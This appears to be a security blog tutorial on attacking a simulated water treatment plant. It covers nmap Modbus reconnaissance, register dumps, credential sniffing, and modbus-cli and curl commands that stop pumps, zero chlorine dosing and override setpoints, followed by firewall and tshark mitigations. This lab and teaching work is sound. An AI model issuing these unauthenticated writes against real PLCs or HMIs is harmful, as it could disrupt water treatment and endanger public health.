How I Hacked a City’s Water Supply: A Deep Dive Into Modbus, SCADA, and OT Insecurity + Video

Listen to this Post

Featured Image

Introduction:

Industrial Control Systems (ICS) and Supervisory Control and Data Acquisition (SCADA) environments form the backbone of critical infrastructure, from water treatment to power generation. However, the legacy protocols they rely on, such as Modbus, were designed decades ago without security in mind, often operating without authentication or encryption. This article dissects a recent penetration testing exercise on a simulated municipal water treatment plant, revealing how easily unauthenticated Modbus communications can be exploited to manipulate physical processes and cause catastrophic failures.

Learning Objectives:

  • Understand the architecture of a SCADA/PLC environment controlling critical infrastructure.
  • Learn how to perform reconnaissance and fingerprinting on ICS networks using open-source tools.
  • Execute attacks on Modbus protocols to manipulate physical processes, including stopping pumps and altering chemical dosing.

You Should Know:

  1. Setting Up the Lab: Cloning the Municipal Water Treatment Plant Simulator
    The foundation of this exercise is a virtual industrial environment created by Gnana Aravind K, which includes a virtual Modbus PLC, a SCADA HMI, and a custom pentesting toolkit.

Step‑by‑step guide:

  1. Clone the Repository: First, download the simulation environment from the provided GitHub link.
    git clone https://github.com/ganarana-v/ICSSecurityLab.git
    cd ICSSecurityLab/WaterTreatmentPlant
    
  2. Review the Architecture: Read the `README.md` to understand the network topology. Typically, the PLC and HMI will be on a virtual network (e.g., 192.168.1.0/24).
  3. Start the Environment: Use Docker or a provided script to spin up the containers.
    docker-compose up -d
    
  4. Verify Connectivity: Ensure your attacking machine (likely Kali Linux) can reach the targets.
    ping 192.168.1.10
    

2. Reconnaissance: Scanning for Modbus Slave IDs

Before interacting with the PLCs, we need to identify which Modbus Unit IDs (slaves) are alive on the network. We can use `nmap` with its Modbus script.

Step‑by‑step guide:

  1. Discover Live Hosts: First, find the PLC IP address.
    sudo nmap -sn 192.168.1.0/24
    

Expected output: `Nmap scan report for 192.168.1.10`.

  1. Scan for Modbus Service: Verify the Modbus port (502) is open.
    nmap -p 502 192.168.1.10
    
  2. Enumerate Unit IDs: Use the `modbus-discover` script to brute-force Unit IDs.
    nmap -p 502 --script modbus-discover 192.168.1.10
    

    This script sends requests to Unit IDs 1-255. A response confirms the PLC is alive and reveals which Unit IDs are in use (e.g., Unit ID 1 for the main pump controller).

  3. Fingerprinting the Device and Dumping the Memory Map
    To understand the industrial process, we need to extract all readable coils (binary outputs) and registers (16-bit data).

Step‑by‑step guide using `modbus-cli` (Python tool):

1. Install Modbus CLI:

pip install modbus-cli

2. Read All Coils (Discrete Outputs): Dump the state of all coils from address 0 to 999.

modbus read --unit 1 --function 1 --starting-address 0 --quantity 1000 192.168.1.10

3. Read All Holding Registers: Dump the process values (setpoints, tank levels).

modbus read --unit 1 --function 3 --starting-address 0 --quantity 100 192.168.1.10

4. Interpret the Data: A value of `1` for a coil might mean “Pump Running,” while a register value of `750` might mean “Tank Level: 75.0%”. Correlate these with the HMI display to map the memory.

4. Extracting Maintenance Credentials

Often, credentials for the engineering workstation or HMI are hardcoded or stored in plaintext within the PLC’s memory or the HMI’s configuration files.

Step‑by‑step guide:

  1. Intercept HMI Traffic: If the HMI uses a web interface, run Wireshark to capture traffic while an engineer logs in.
    wireshark
    

Filter by `http` or `tcp.port == 80`.

  1. Analyze PLC Registers: Sometimes the credentials are stored in specific holding registers. Scan memory ranges looking for ASCII strings. Write a small Python script to convert register values to characters. For example, register values `0x0041 0x0042` translate to “AB”.

  2. Exploiting Process Control: Forcing Pump Stop and Chlorine Dose Manipulation
    This is the core of the attack: issuing unauthorized writes to the PLC to disrupt physical operations.

Step‑by‑step guide using `modbus-cli`:

  1. Force Stop the Main Pump: Identify the coil controlling the pump (e.g., Coil address 5). Writing `0` stops it.
    modbus write --unit 1 --function 5 --starting-address 5 --value 0 192.168.1.10
    

    What this does: This sends a “Force Single Coil” command (Function Code 5) to turn the coil OFF, stopping the pump regardless of the HMI’s automatic logic.

  2. Disable Chlorine Dosing: Find the register controlling the chlorine dosing setpoint (e.g., Register 100). Write `0` to stop the flow.
    modbus write --unit 1 --function 6 --starting-address 100 --value 0 192.168.1.10
    
  3. Bulk Setpoint Override: To trigger an emergency shutdown, we can write multiple registers at once using Function Code 16.
    modbus write --unit 1 --function 16 --starting-address 50 --output-value 0,0,0,0,0 192.168.1.10
    

    What this does: This writes zeros to five consecutive registers (addresses 50-54), potentially overriding all safety limits and process targets simultaneously.

6. HMI REST API Attacks

Modern HMIs often expose REST APIs for web dashboards. These can be vulnerable to IDOR or broken authentication.

Step‑by‑step guide using `curl`:

  1. Discover API Endpoints: Inspect the HMI web page source (F12) or use a tool like `ffuf` to fuzz for API paths.
  2. Check for Unauthenticated Access: Attempt to fetch data without a session token.
    curl http://192.168.1.100:8080/api/process/data
    
  3. Manipulate Data via API: If an endpoint like `/api/setpoint` exists, attempt to POST malicious values.
    curl -X POST http://192.168.1.100:8080/api/setpoint/pump1 -H "Content-Type: application/json" -d '{"value": 0}'
    

    This could achieve the same effect as the Modbus write, but via the HMI’s own interface, potentially bypassing network segregation between the IT and OT networks.

7. Triggering Emergency Shutdown and Mitigation

By chaining these attacks (stopping pumps and disabling dosing), the system detects unsafe conditions and initiates an Emergency Shutdown (ESD).

Understanding the Impact:

  • Why it works: The Modbus protocol trusts the client. It does not validate if the command source is authorized.
  • Mitigation Commands (Linux/Windows):
  • Network Segmentation: Use `iptables` on Linux to restrict access to port 502.
    sudo iptables -A INPUT -p tcp --dport 502 -s [bash] -j ACCEPT
    sudo iptables -A INPUT -p tcp --dport 502 -j DROP
    
  • Monitor Anomalies: Use `tshark` to detect writes to critical registers.
    tshark -i eth0 -Y "modbus.func_code == 6 && modbus.reference_num == 100"
    

What Undercode Say:

  • Key Takeaway 1: Legacy protocols are the Achilles’ heel of critical infrastructure. The absence of authentication in Modbus allows anyone with network access to become a rogue operator.
  • Key Takeaway 2: Simulators are invaluable for understanding the physical consequences of cyber attacks. Seeing a digital pump stop or a chlorine level drop to zero solidifies the risk far more than a theoretical report.

This exercise highlights a critical gap in industrial security: while IT teams focus on data breaches, OT teams must prepare for kinetic warfare. The attack required no zero-day exploits, just a basic understanding of industrial protocols and freely available tools. Defending against this requires a shift from “air-gap” myths to robust network monitoring, deep packet inspection, and strict adherence to the ISA/IEC 62443 standards for zone-based segmentation.

Prediction:

As nation-state actors and hacktivists become more sophisticated, we will see a rise in “hybrid attacks” that target the intersection of IT and OT. Specifically, AI-driven anomaly detection will become mandatory in water and power utilities, but conversely, attackers will use AI to generate “noise” that mimics normal process variations to hide their manipulation of setpoints over long periods, leading to gradual, catastrophic failures rather than immediate shutdowns.

▶️ Related Video (76% Match):

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Khanjen P – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky